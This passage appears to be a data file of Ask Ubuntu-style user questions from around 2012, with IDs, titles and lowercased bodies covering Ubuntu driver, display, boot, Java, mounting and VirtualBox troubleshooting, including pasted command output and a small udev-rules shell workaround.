libavahi-common3 : i386 libgpg-error0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : fglrx-amdcccle the following new packages will be installed : fglrx fglrx-amdcccle 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/41.8 mb of archives . after this operation , 130 mb of additional disk space will be used . . any thoughts ?
121534	command history in zsh	currently i have zsh set up in such a way that command history is shared between all sessions immediately . say i have a terminal emulator open with two tabs , each with a zsh session , a1 and a2 . if i enter ls -la in a1 , and then go to a2 and press up arrow key , i will see ls -la in the command prompt . i would like to change it so sessions do n't share the command history with each other although when you start new session it gets all the previous history from all sessions before it .
121542	what to do about usb support ?	usb speeds are consistently slow in ubuntu , and have been for years . i just bought two new machines with usb 3.0 , running 10.04 , and yet nothing has changed , top speeds are only about 8.0 mb per second and they quickly drop to 2 or less . its very frustrating . are there any fixes for this at all ? i find almost nothing online . the board is a gigabyte 970a-ds3 motherboard . is there any driver i should install ? i am using brand new usb sticks ( kingston ) and making sure to plug into the 3.0 ( blue ) slot .
121546	why my hdd is being used out of design parameters ?	i installed ubuntu 10.04 , 11.10 separately ( not at the same time ) and both of them tell me that my primary hdd is being used out of design parameters . i installed by using the option use entire disk . and at first boot i get the error and takes me to disk utility . it is a 40gb samsung hdd ide drive . windows and several other tools said that my hdd is healthy .
121556	intel centrino wireless n 1000 does n't work on a lenovo z560	i upgraded my ubuntu 11.04 to 11.10 and my wifi has stopped working . i have a lenovo z560 that has intel centrino wireless-n 1000 . i have searched various threads having similar problems for a solution and have no success . the wlan0 is not even showing up in rfkill . please help me find a solution . i am giving below the output of various debug commands . thanks in advance . distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' -- -- # # uname -a linux gurucharapathy-laptop 3.0.0-17-generic-pae # 30-ubuntu smp thu mar 8 17:53:35 utc 2012 i686 i686 i386 gnu/linux -- -- # # lspci -nnk | grep -ia2 net 05:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0084 ] subsystem : intel corporation centrino wireless-n 1000 bgn [ 8086:1315 ] kernel modules : iwlagn 06:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) subsystem : lenovo device [ 17aa:392e ] kernel driver in use : r8169 -- -- # # iwconfig lo no wireless extensions . eth0 no wireless extensions . -- -- # # iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . -- -- # # rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no -- -- # # lsmod module size used by rfcomm 38408 8 bnep 17923 2 parport_pc 32114 0 ppdev 12849 0 binfmt_misc 17292 1 snd_hda_codec_hdmi 31426 1 snd_hda_codec_conexant 52460 1 uvcvideo 67271 0 videodev 85626 1 uvcvideo snd_hda_intel 28358 2 snd_hda_codec 91859 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec joydev 17393 0 snd_pcm 80435 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 i915 509554 9 drm_kms_helper 32889 1 i915 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28932 2 snd_pcm , snd_seq drm 196290 5 i915 , drm_kms_helper snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq mei 36466 0 mac80211 393421 0 snd 55902 14 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ideapad_laptop 13575 0 intel_ips 17753 0 btusb 18160 2 i2c_algo_bit 13199 1 i915 soundcore 12600 1 snd bluetooth 148839 23 rfcomm , bnep , btusb cfg80211 172427 1 mac80211 psmouse 63474 0 serio_raw 12990 0 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm sparse_keymap 13658 1 ideapad_laptop wmi 18744 0 video 18908 1 i915 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp ahci 21634 2 libahci 25761 1 ahci r8169 47200 0 -- -- # # nm-tool networkmanager tool state : asleep device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unmanaged default : no hw address : 88 : ae:1d : de:5f:9c capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on -- -- # # lshw -c network *-network unclaimed description : network controller product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d6400000-d6401fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : 02 serial : 88 : ae:1d : de:5f:9c size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.0.100 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : d2410000-d2410fff memory : d2400000-d240ffff memory : d2420000-d243ffff
121559	after executing a command in the terminal , i sometimes ca n't execute another	first off sorry for the noob question , i 'm sure it 's been asked before but i have no idea how to phrase it eloquently ... sometimes when i open/run/execute ( unsure of proper term ) an application ( ? lol ) from the terminal like geany ie : geany filename.php or maybe run a node.js script : node server.js the command will execute fine , but i 'm then left without the ability to execute any other commands unless i open another terminal . my root @ pcname : ~ $ is gone and when i try typing in something else and hitting enter it just breaks to the next line . i 've noticed that sometimes i can hit ctrl+d and it 'll give me my prompt back ( sorry is prompt even the right name for it ? ) so could someone please explain why this is happening and how i can get back to the prompt without opening another terminal . thanks , and sorry again for my noobery .
121563	how do i get launchy to open chromium ?	i 'm developing in rails on my computer . i 'm just going along with what tutorials say , and i simply can not find anything about how to use launchy during development on the internet .. period . there are two problems : i 'd like launchy to open chromium ( it opens firefox ) . chromium is set as my default browser . i save files constantly , and launchy will run each time , which is terrible . is there any way to only get it to run when you actually want ? this also applies to guard , but it 's not nearly as annoying with guard .
121569	prevent nautilus showing partition mounted in bash script	in my bash script i mount partitions , check them , copy files to them , and unmount . when the script mounts the partition , nautilus pops up with a window showing the partition and stealing focus . this is something i want to avoid . note : i know i can change the behaviour of this in system settings , details , removable media , never prompt or start programs on media insertion , but i do n't want to change the behaviour e.g . if a usb stick is plugged in , i just want to prevent it in my bash script . since this script runs on other users ' computers i can not modify these settings ( in the script ) because if it is terminated abnormally it will leave the modified settings in place ( i also do n't believe it should be necessary to do this ) . actually this auto display does n't seem consistent . if i do the exact same command from the terminal , nautilus does n't show , and i know there are other mounts in my script that do n't show . so what could be causing this ? here 's an example of the code ( both cause separate nautilus windows to pop ) : mount $ dev $ target mkdir -p $ target/home mount $ homedev $ target/home i 'm interested in understanding the process by which the mount signals nautilus and why this is happening ( when it does n't if i mount the partition from the terminal ) . and what is the best way to prevent this from happening . i noticed this behaviour starting on release 11.10 ( if i recall correctly ) . i 'm currently running 12.04 , but the script has to work on all supported releases . i do n't believe the solution should involve modifying system settings ( that might differ between releases ) . for example , if you look at other things that mount partitions ( like os-prober ) , there are no nautilus windows popping up when it mounts different partitions . the script can be found here . and here 's the part where nautilus pops . i think it also pops here , but i 've been focusing my testing on the first link . this is where it does n't pop , called prior to those other mounts - note i 've rewritten the first ones as -- read-only and within an if statement and it makes no difference . ideally the answer will explain why this is happening and how to prevent it , in other words , explain why the in-script mount is treated differently to the one issued from a terminal . a good workaround will also be accepted if it is a fully explained solution and practical that can support all desktop environments ( ubuntu , kubuntu , xubuntu , lubuntu etc ) - i also want to avoid an exponential increase in testing to verify it . thanks in advance ============ solution as per papashou 's link : add_udev_rules ( ) { for i in `` $ dev '' `` $ homedev '' `` $ bootdev '' `` $ usrdev '' ; do if [ -n `` $ i '' ] ; then block= $ { i # /dev/ } echo `` kernel==\ '' '' '' $ block '' '' \ '' , env { udisks_presentation_hide } =\ '' 1\ '' '' > > `` $ wubi_move_dir '' /wubi_move.rules fi done cp `` $ wubi_move_dir '' /wubi_move.rules /etc/udev/rules.d/wubi_move.rules udevadm trigger > /dev/null 2 > & 1 } remove_udev_rules ( ) { rm /etc/udev/rules.d/wubi_move.rules rm `` $ wubi_move_dir '' /wubi_move.rules udevadm trigger > /dev/null 2 > & 1 } this achieves the desired result , but feels like a sledgehammer approach . i believe there is probably a fine-tuning in udev that will allow the partition to still show in nautilus ( and other file browsers ) without popping up when it 's mounted . by the way if anyone wants to try this , the following script will show the pop-up effect of nautilus : mkdir -p /tmp/testmount mount /dev/sda1 /tmp/testmount sleep 3 umount /dev/sda1 mount /dev/sda1 /tmp/testmount sleep 3 umount /dev/sda1 mount /dev/sda1 /tmp/testmount sleep 3 umount /dev/sda1 mount /dev/sda1 /tmp/testmount sleep 3 umount /dev/sda1 rmdir /tmp/testmount i 'm going to keep playing with udev and i 've also filed a bug , since this does n't make any sense for a partition that 's not inserted to act like an inserted usb/media card upon mount . also the udevadm trigger is not an inexpensive operation that appears ( on 12.04 at least ) to temporarily freeze everything . so , in summary , i have a workable solution ( thanks to everyone who helped out ) , which i may or may not implement ( not sure yet ) ; but i 'll keep looking for something else . thanks
121570	unable to install applications ( oneiric )	when i use the software center to install something , i get the error : an unhandlable error occured there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks on using the command line : $ sudo apt-get install < something > e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . i am unable to install anything . how do we fix this ?
121576	why are luciole 's and stopmotion 's screenshots inverted in ubuntu software center ?	using 12.04 beta and navigating in the ubuntu software center , i noticed that luciole has stopmotion 's screenshot , and stopmotion has luciole 's screenshot . however , on screenshots.debian.net , it looks like everything is in order : http : //screenshots.ubuntu.com/package/luciole http : //screenshots.ubuntu.com/package/stopmotion any idea why ?
121578	oh unity launcher scrambled with color dots after log on or restart	the left hand side unity launch bar is color scrambled after reboot , or log on . when touching it with the mouse arrow , it comes back to normal . i installed gnome shell color before this started happening . i will uninstall gnome shell color & see if this problem goes away . any one ever see this happen . i run a nvidia 550ti ge-force graphic card . i have the latest 295.33 driver from nvidia installed and it does show activated in my restricted driver window . oh yeah , before you inform me , i can tell you that yes , i do see the instructions to report bugs to the correct source . but i really do n't know if this is a bug or not . could be something else .
121586	enable hp coolsense on ubuntu ?	i own a hp laptop with hp coolsense . i use ubuntu on it as my only operating system . i have noticed the computer has been getting extremely hot , and i am beginning to worry if it is damaging the computer . is there a program i can use compatible with hp 's coolsense to adjust the fan speed and other related temperature problems ?
121591	computer logout after closing the lid	i would like my computer to logout every time i close the lid . and by that i mean log out completely . basically i want the startup applications to run every time i open the lid to my computer . right now , it just locks the screen and comes right back when i type in my password . it would be really great if i can have it such that the startup applications run every time i open the lid . however , would logging out lose any unsaved files ? alternatively , do you know if there is a way to run a command every time i open the lid ? this is a dell inspiron e1505 running ubuntu 10.04 .
121592	is it possible to install games like defense of the ancients in ubuntu ?	let 's just say i 'm already a little bit pro in using ubuntu but i have n't try to install some of my favorite games in ubuntu . is it possible to put games like we usually play in windows ? and how can i install them in ubuntu ?
121595	eclipse icon missing while switching through applications in unity	i installed eclipse directly from the eclipse site and added it to unity launcher as mentioned here . but when i cycle through applications using alt-tab , i can not see eclipse . couple of times , i had to kill eclipse using kill command and restart eclipse just to access it . but later i found out that if i select desktop icon while switching , i can access eclipse . how to get an independent eclipse icon while switching applications using alt-tab ? thanks suresh
121598	starting and shutting down lampp with sudo access	i have read somewhere on net that we can install lampp ( apachefriends.org/en/xampp-linux.html ) in such a way that any user can start and/or stop lampp server using nobody is is possible ? let me know how can i do it ? i want to set permissions so that starting and stopping can be made public .
121600	what is the 'sound settings ' program 's name in ubuntu	i use xubuntu . recently i removed all ubuntu/unity related packages in the hope to have a more responsive and less cluttered system . before i removed ubuntu/unity packages following using this command . after the removing of the packages the program thats starts when selecting 'sound settings ... ' is a different one than it was before when unity was installed . as i have a bluetooth speaker i connect to i would like to have the 'old ' sound settings program back . the latter enabled me to select the bluetooth speaker as output . i did install sudo apt-get install gnome-control-center and the sound menu became the old one again . good but once i 've connected my bluetooth speakers via the bluetooth indicator in the panel there is still no speaker to select as output . what package do i need to install ?
121608	how can i prevent a mount from being displayed as a removable media ?	when a user session starts , i bind some /mnt/nfs_share into /home/username/afolder using mount -- bind . then nautilus displays the mounted folder as a separate volume and the removable media applet is shown to allow ejection . i would like the binding to be transparent for the user . using a symbolic link is n't exactly what i 'm looking for , because the user can delete this link from its home directory and the folder appears as external to user home tree .
121614	dual monitors on ubuntu 11.10	i checked solution from other question but after entering nvidia settings > x server display configuration i get : unable to load x server display configuration page : failed to query noscanout for screen 0 . i have 2 dell monitors , settings see only 1 unknown monitor .
121617	how do i change the purple dotted background in unity-greeter before the default background image ?	how do i change the default purple dotted background that appears right before the background image in unity greeter in 12.04 precise ? to be clear , this is in the brief moment right before the unity-greeter user wallpaper is displayed in 12.04 ( although this occured previous to 12.04 that 's what i 'm using ) .
121624	what is telepathy-indicator ?	what is telepathy-indicator ? and what does it do ? all i can find is that it 's a `` desktop service to integrate telepathy with the messaging menu '' which , i 'm afraid , means nothing to me . can i remove it safely ?
121626	compiz uses 100 % cpu since nvidia update	this morning , i logged into unity 3d and noticed that everything was really slow and unresponsive . i pressesd ctrl + alt+ f1 to open a terminal and diagnose the problem . it turns out that compiz is constantly using 100 % cpu . i checked the software center for recently installed updates and found out that yesterday some updates for the nvidia driver had been installed . i have installed the nvidia driver from the system settings - > additional drivers menu . i 'm using ubuntu 11.10 64 bit and my videocard is a nvidia 8800gts . i have tried the following to solve the problem : uninstall and reinstall the current driver ( i have the 'version current [ recommended ] ' installed ) install another driver version . in the additional drivers menu some other driver are available install the nvidia driver from a ppa i was unable to solve the problem . any ideas ?
121631	why does the audacity icon change in the launcher if the launcher icon size is adjusted ?	i noticed when i was fiddling with the launcher icon size that at a certain size the icon for audacity changes . does anyone know why this would happen ?
121632	how to make my dvb-t/fm tuner work ?	i just purchased a dvb-t/fm tuner card `` avermedia h830 hybrid usb '' by avermedia ( 07ca:0830 ) . apparently i do n't have any dvb-t signal where i live ( or i just ca n't figure out how to use this 'femon ' tool ) . anyways i 'm trying to make this card actually work , meaning that i 'm looking for an app that will give me the ability to watch fm tv alongside radio and dvb-t like the windows version does and i just ca n't find something like that . i downloaded me-tv , no use , israel is not included as well as no fm support . i see that my only logical way to solve this problem is to utilize mythtv , although a wonderful app i 'm not sure i need such a complicated software ... thank you all for your help in advance ! kind regards , yaron shahrabani .
121636	confused with x.org version number	there is my trouble : i 'm trying to install ati drivers on my dell vostro 3350 laptop . on the amd 's site i followed steps to determine which driver should i use . after selecting what hardware i use i got a link to download amd-driver-installer-12-3-x86.x86_64.run and below was a description of that driver that it was compatible with x.org version from 6.7 to 7.6 . and i do not know what version of x.org my ubuntu uses . cause after googling i found that version is 7.6 in ubuntu 11.10 . but after typing : x -version i got the output : x.org x server 1.10.4 release date : 2011-08-19 x protocol version 11 , revision 0 so what is the exact version of x.org in ubuntu 11.10 and how should one reliably determine it ? can anyone construe ? thanks .
121639	install package in ubuntu obsolete release	i need to install the lm-sensors package into an ubuntu 9.10 release . i can not update ubuntu ( do n't want to bother you now with the details ) . it 's useless to try with apt-get , so i would like to download the deb package and try it `` manually '' . does anybody now where to find it ? thanks .
121643	why does waking from hibernate take nearly ten minutes on 11.10 ?	im running 11.10 64bit on a dell xps 15 l502x laptop . it uses an i5 proc and has 16gb ram . whenever i close the lid on the laptop i have it set to hibernate as i want to continue whatever i was previously running . generally that is simple text editing , so my mem usage would normally be only a gb or 2 . when i open the lid and it resumes from hibernation , it takes up to ten minutes to do so . extremely frustrating . is there anything i can do to make hibernate function properly . on windows it used to wake from hibernation in less than 30 seconds . its really frustrating and souring my experience with ubuntu . any help would be gratefully appreciated ! thanks guys/gals ! s
121644	really impossible to have gimp 2.8 on ubuntu 11.10 ?	for days , i have been trying to find a solution and repositories to install gimp 2.8 on ubuntu 11.10 . each time i get this error : tried to update pango via sudo apt-get install pango-graphite [ sudo ] password for xxx : reading package lists ... done building dependency tree reading state information ... done pango-graphite is already the newest version . then also tried sudo apt-get install libgdk-pixbuf2* reading package lists ... done building dependency tree reading state information ... done note , selecting 'libgdk-pixbuf2.0-0 ' for regex 'libgdk-pixbuf2*' note , selecting 'libgdk-pixbuf2.0-dev ' for regex 'libgdk-pixbuf2*' note , selecting 'libgdk-pixbuf2.0-doc ' for regex 'libgdk-pixbuf2*' note , selecting 'libgdk-pixbuf2-ruby ' for regex 'libgdk-pixbuf2*' note , selecting 'libgdk-pixbuf2-ruby1.8 ' for regex 'libgdk-pixbuf2*' note , selecting 'libgdk-pixbuf2-ruby1.8-dbg ' for regex 'libgdk-pixbuf2*' note , selecting 'libgdk-pixbuf2.0-common ' for regex 'libgdk-pixbuf2*' libgdk-pixbuf2-ruby is already the newest version . libgdk-pixbuf2-ruby1.8 is already the newest version . libgdk-pixbuf2-ruby1.8-dbg is already the newest version . libgdk-pixbuf2.0-doc is already the newest version . libgdk-pixbuf2.0-0 is already the newest version . libgdk-pixbuf2.0-dev is already the newest version . libgdk-pixbuf2.0-common is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 31 not upgraded . and still error : ( . please help as i do not want to upgrade to ubuntu 12.04 just to have gimp . really a mission impossible ? ? ? ?
121648	how can i remove bluetooth-applet in 11.10 ?	i tried adding rfkill block bluetooth to /etc/rc.local . this did not work . i tried adding both blacklist bluetooth and blacklist btusb to etc/modprobe.d/blacklist.conf . this did not work . so i went to synaptic to remove it altogether , but when i marked bluez for removal it said it was going to also remove gnome-shell as well ! so naturally i did n't do that . ( is it sane to run a potential security problem like bluetooth by default ? and why is something like that so tightly integrated into gnome shell ? ) can anyone tell me how to get rid of this annoying and unnecessary process ?
121649	ca n't boot into ubuntu , black screen after grub menu	ubuntu is not booting properly for me anymore . the grub menu comes up , and whether i choose a linux recovery mode or the normal one i get a black screen after a few seconds . there is a brief message about vga=791 being deprecated , but i am not able to read it fully because the black screen covers it up almost immediately . i have googled for hours for solutions , and most people seem able to solve similar problems by editing in grub and adding nomodeset into the line starting with linux /boot ... but this solution is not working for me , i still do n't get any gui . sometimes i am able to get the dmesg rolling past , i think it was when i removed quiet splash from that line , but still no gui - the computer seems to be on and working because it responds to a ctrl-alt-del and reboots . i have tried with 3 different graphics cards ( 2 nvidia and 1 ati ) and swapping them does n't seem to change the behaviour at all . what else can i try ? edit with more info : i recorded a video of the screen to see what the error message that flashes up was . it says : booting a command list vga=791 is deprecated . use set gfxpayload=1024x768x16,1024x768 before linux command instead . so i tried using that instead , a line like set gfxpayload= $ linux_gfx_mode was already there , so i changed it to set gfxpayload=1024x768x16,1024x768 instead and tried booting up with and without nomodeset and other combinations with quiet , splash.. still no luck . usually i get the message booting a command list and then the black screen of death . other times i was able to get some info scrolling past , and then suddenly the font changes to a skinnier font and the line at the top which said booting a command list now changes to some strange other characters : i 'm at a loss as to what to do , my computer has been unusable for days now . at least when windows breaks i can boot up in safe mode !
121651	creating a gtk theme , but qt and java apps are not affected , and title bar button layout is ugly	i 'm playing with a gtk2 / gtk3 theme which i use in the mate desktop . everything is looking well , even gtk3 apps , but i still have 3 important issues : java apps ignore the theme qt apps ignore the theme i 'm using those nice ubuntu 10 title bar buttons , but the problem is , when only the close button appears , the title bar looks ugly . can i make it so that it shows the two other buttons , but disabled ? i do n't know how ubuntu 10 handled this . here 's a screenshot showing the 3 problems ( above is a small java app , below is a qt app ) : under my previous desktop environments , unity and cinnamon , both apps seemed to be taking the right theme correctly , but i did not use my custom theme yet . cinnamon is based on gnome-shell by the way , and mate is a gnome2-fork . please note that the shown java app explicitely tries to load the gtk theme at runtime . by default , java apps do n't , but this one has the necessary code , which worked in unity and cinnamon . any suggestions how i could make my theme better so these problems disappear ? thank you very much !
121653	how to force start ubuntu without keyboard	old toshiba xp laptop will not load can not be started in safe mode or boot ubuntu from disc as arrow keys do not work , any ideas appreciated even if it means wiping computer with another program , i have no windows discs want it to be stand alone linux computer how do i get linux to force start installation
121654	how to set default java version ?	i have followed all the instructions stated at this question , but am encountering some problems with the last part of it . i actually have version 6.22 of java and would like to update to version 6.30 . so after moving the extracted directory java-6-oracle into /usr/lib/jvm i do not know what to do , since the script that is pointed out in the answer above updates from java 5 to java 6 . for sake of clearness here is output if i do an ls in dir /usr/lib/jvm : matteo @ matteo-thinkpad-sl : /usr/lib/jvm $ ls -l total 8 lrwxrwxrwx 1 root root 14 2011-07-12 15:18 default-java - > java-6-openjdk lrwxrwxrwx 1 root root 14 2011-07-12 12:19 java-1.6.0-openjdk - > java-6-openjdk drwxr-xr-x 10 root root 4096 2012-04-12 12:06 java-6.31-oracle drwxr-xr-x 7 root root 4096 2012-02-24 14:43 java-6-openjdk what should i do now ? added part under the suggestion of @ fossfreedom i ran the script anyway and actually it updated the java version . infact if i run command java -version outpu will be the following : matteo @ matteo-thinkpad-sl : ~ $ java -version java version `` 1.6.0_31 '' java ( tm ) se runtime environment ( build 1.6.0_31-b04 ) java hotspot ( tm ) server vm ( build 20.6-b01 , mixed mode ) there is still a problem , if irun javac -version it gives me the old version installed : matteo @ matteo-thinkpad-sl : ~ $ javac -version javac 1.6.0_22 and if i use the tester at this link it will tell me that version is java version 1.6.0_22 from sun microsystems inc. what 's going wrong ? it seems that java runtime environment has updated , but java compiler and java plugin for browser have not . how can i update them ? other added part sudo update-alternatives -- config java will return following output matteo @ matteo-thinkpad-sl : ~ $ sudo update-alternatives -- config java there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/lib/jvm/java-6.31-oracle/bin/java 1062 auto mode 1 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 manual mode 2 /usr/lib/jvm/java-6.31-oracle/bin/java 1062 manual mode press enter to keep the current choice [ * ] , or type selection number : these makes sense with the fact that jre is correctly updated to version 6.31 , issues are on java compiler and java browser plugin . any ideas ?
121656	access to windows files from ubuntu dual boot	my windows xp partition became corrupted recently , however i fortunately had installed ubuntu 11.10 in a dual boot fashion . how can i access my windows files from ubuntu ?
121658	how can i go back to nvidia 295.33 driver ?	when i updated my nvidia driver to 295.40 unity is not working any more i just get a black screen and nothing happens although unity 2d and gnome classic are working fine so i think it 's a problem with 3d acceleration ... now how can i go back to 295.33 driver ? nvidia geforce 7025 / nforce 630a thank you
121664	downloading 12.04 beta today - does it now have the daily distro updates ?	i downloaded the 12.04 beta 2 on the day of launch and have been testing and sending bug reports . i now want to install it on another machine . my question is do i use the original image i downloaded and apply the daily distro updates through update manager or do a download a new image ( because it now has the distro updates included ) . to be clear i am asking does the 12.04 beta 2 iso get updated on a daily basis ?
121670	pbuilder-dist precise build *.dsc fails	i 'm following this tutorial on the ubuntu on how to fix a bug , but am encountering a problem when i try to build the source package . in the section entitled 'testing the fix ' , the reader is told to execute two command to complete the build : $ bzr builddeb -- -s -us -uc $ pbuilder-dist < release > build ../ < package > _ < version > .dsc the first one works fine , and i get a nice collection of packages , including the .dsc file needed to build . however when i fill in the palceholders in the second one and execute it , so it looks like this : pbuilder-dist precise build ../gedit_3.1.1-0ubuntu4.dsc i get the following output : w : /home/notgary/.pbuilderrc does not exist e : file /home/notgary/pbuilder/precise-base.tgz does not exist i 've followed the pbuilderhowto on the wiki and have created ( i think ) a precise tarball using sudo pbuilder create -- distribution precise but the only contents of my ~/pbuilder directory is precise_result what have i done wrong when setting up my build environment , and what do i need to do to fix it so i can build precise packages using pbuilder ?
121671	ubuntu 12.04 with dual monitors	i have two monitors which where recognized in ubuntu 12.04 after the installation was completed but now , after installing the ati driver , one of my monitors is shown as `` laptop '' . everytime i try to switch `` mirror displays '' off i get an error saying that the resolution is not supported .
121676	configuration for samsung ssd 830	i would like to know what would be the best filesystem configuration for a samsung ssd 830 of a fresh ubuntu 12.04 install on my laptop ( asus u33jc ) . i 've seen people suggesting a raid configuration , but i have no idea where to start with this .
121678	the resulting .iso does n't work - multicd	burning a separate cd for each distribution ( ubuntu , kubuntu etc . ) is cumbersome . i found multicd which promises me to have a single dvd which can hold several distributions . it is very great tool . main problem : the resulting .iso created from multicd does n't work in a usb pen drive through i have n't tested it in a dvd . running the .iso through pen drive ( i mean booting from pen drive ) does n't work . i can not even run it in live mode or can install it . concern : i think if i burn the .iso to a dvd then might it will work . but considering it does n't work in the pen drive , will it work on the dvd ? so how to fix it ? if you know other method to make a multi cd/dvd then please tell me .
121682	`` shared folders '' feature is not working in virtualbox	i have ubuntu 11.10 as a host and another linux 2.6 distribution as a guest . when i try to setup guest additions , this error message appears building the shared folder support module .. fail and because of that , when i run the following in terminal mount -t vboxsf shared /root/shared i get the following error message mount : unknown filesystem type 'vboxsf' any syggestions please ? edit sorry , the mentioned error message is n't complete , this is it . building the shared folder support module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) this is the content of vboxadd-install.log uninstalling modules from dkms attempting to install using dkms creating symlink /var/lib/dkms/vboxguest/4.1.2/source - > /usr/src/vboxguest-4.1.2 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.2.6 -c /lib/modules/3.2.6/build m=/var/lib/dkms/vboxguest/4.1.2/build ... ... ... ... ... ... ... ... .. ( bad exit status : 2 ) error ! bad return status for module build on kernel : 3.2.6 ( i686 ) consult the make.log in the build directory /var/lib/dkms/vboxguest/4.1.2/build/ for more information . 0 0 error : binary package for vboxguest : 4.1.2 not found failed to install using dkms , attempting to install without make kbuild_verbose=1 -c /lib/modules/3.2.6/build subdirs=/tmp/vbox.0 srcroot=/tmp/vbox.0 modules test -e include/generated/autoconf.h -a -e include/config/auto.conf || ( \ echo ; \ echo `` error : kernel configuration is invalid . `` ; \ echo `` include/generated/autoconf.h or include/config/auto.conf are missing . `` ; \ echo `` run 'make oldconfig & & make prepare ' on kernel src to fix it . `` ; \ echo ; \ /bin/false ) mkdir -p /tmp/vbox.0/.tmp_versions ; rm -f /tmp/vbox.0/.tmp_versions/* warning : symbol version dump /usr/src/linux-source-3.2.6/module.symvers is missing ; modules will have no dependencies and modversions . actually the log file is very large and it exceeds the 30000 characters limit . how can i upload the entire log file here ?
121691	strange issue ! red light coming out from headset jack	it is a very strange issue . this issue exists since i use ubuntu . in ubuntu 10.10,11.04 , 11.10 and even in the latest beta of 12.04 has this issue . the jack has red light light coming out . although all seems to work fine but i am afraid if there is issue with my lappy . is this normal behavior ?
121692	12.04 after latest update , no unity , no top bar , only wallpaper . can you help ?	i just updated to the latest 12.04 and it recommended to restart , so i did . after the restart , only the wallpaper shows , no unity dash , no top bar.i tried to reset unity ( by using tty2 ) but the result is the same : only the wallpaper shows . i also noticed that by right clicking , i get the desktop menu but the windows has no top bar ( upper decoration with close-minimize button ) , if this helps . i also sudo apt-get update and sudo apt-get upgrade in tty2 , but there were no new packets to update . do you have any suggestions ?
121693	finger reader for hp probook6560b not recogized	i have ubuntu 11.10 64bit on hp probook 6560b . all my hardwars are recongized , but the finger print is not recongized . in the driver page of hp probook6560b i dont found the driver , my device id is : bus 001 device 003 : id 138a:003c validity sensors , inc. vfs471 fingerprint reader please help m
121698	how do i reset a lost password ( using recovery mode requires me to type the password ) ?	i need to reset my password . i have followed these steps : how do i reset a lost administrative ( root ) password ? however , then i go to `` root '' or `` netroot '' recovery options , it tells me : give root password for maintenance ( or type control-d to continue ) clearly , i do not know the root password . if i type control-d , i return to the list of options . from this page i read : under chapter 'the other way ' : 4 . highlight the line that begins kernel and press 'e ' to edit` but in the grub configuration file i have no line that starts with kernel . only : setparams 'ubuntu ... ' recordfail set gxfpayload ... insmod part_msdos insmod ext2 set root= ... search -- no-floppy ... linux /boot/vmlinuz-2.6.38 ... initrd /boot/initrd.img-2.6 ... . those are all lines in my grub . which line should i edit ? or is there another way to reset my password ?
121699	how to run a .bin file without using terminal	how to run an executable .bin file without using terminal eg : qtcreator.bin
121706	how file permissions are stored in inode ?	suppose there 's two pc - `` a '' and `` b '' . then if a downloads a files from b , then what would be the file permission of that downloaded file ? is it possible that the downloaded file in a will have an inode entry with all it 's permissions from b & store b 's user account as the owner ? if that 's the case then is it impossible to change that files permission on a if `` others '' [ as in user-group-others ] does n't have the right to write on that file ? e.g . if this is the case , __x __x __x file.txt [ on b ] then what would be the file permission on a of that same file downloaded from b [ e.g . through vsftpd ] ? __x __x __x file.txt [ on a ] or rw_x rw_x rw_x file.txt [ on a ] [ i.e . defined by a 's default umask value ]
121710	vim change colorscheme and vimrc location file	i am under ubuntu 11.04 and when i type vim -v in the shell i get this : version 7.3.35 first , i want to say that i do n't see any file called vimrc under my home folder . is this normal behavior ? i just see one in /etc/vim i have added colors delek at the end of the mentioned vimrc file ( and i have d*elek.vim* in /usr/share/vim/vim73/colors ) but when i restart vim , i do n't see that scheme . what am i missing here ?
